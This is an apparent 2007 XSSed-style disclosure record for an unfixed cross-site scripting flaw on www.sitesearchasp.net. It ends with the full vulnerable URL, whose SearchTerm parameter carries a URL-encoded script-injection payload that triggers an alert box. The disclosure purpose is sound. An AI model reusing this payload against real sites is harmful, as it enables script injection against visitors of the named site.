Unfixed XSS vulnerability at www.sitesearchasp.net

2007-10-02T00:00:00
ID XSSED:116
Type xssed
Reporter 0ssi3
Modified 2007-10-02T00:00:00

Description

Security researcher 0ssi3, has submitted on 10/02/2007 a cross-site-scripting (XSS) vulnerability affecting www.sitesearchasp.net, which at the time of submission ranked 807465 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 10/02/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail.

Vulnerable URL: http://www.sitesearchasp.net/sitesearchasp.net/engine.aspx?SearchConfiguration=7467BD60741A418AB8D16254B8CD0B3335F31AEBF480F6ADE16829684F0127622B2A336A99B9785B006474E69F4B58B0B85E8C3FCD9999A5096893637774E778CCBDE8349F717FE03274E2F7384EF58FFFD0042C75A6FA18C964309CD48CB81994215A464EA69639CCB78C2D9955BC6D00DC5EAD4B0D66A6E563F3A59D73064B913F5C013554C77BDE3FB25C7EA3918A191DA1DD5D390C64C5A379CBACA420E844EC765D2045E26BEA14B506BC43C8ACE836A882C6F0BE2ECF13CF02A6CC9DD50D20D4B445C7AFE3DF2FF0633FFDF3DB096B07CEB592FC1A3DA80FFB39380B1DE61FE3680AED7BEBA8705CE2428D9DCC0330B81FFCA4CD1C&SearchTerm=%3D%22%3E%3Cscript%3Ealert%28%270ssi3_TR%27%29%3C/script%3E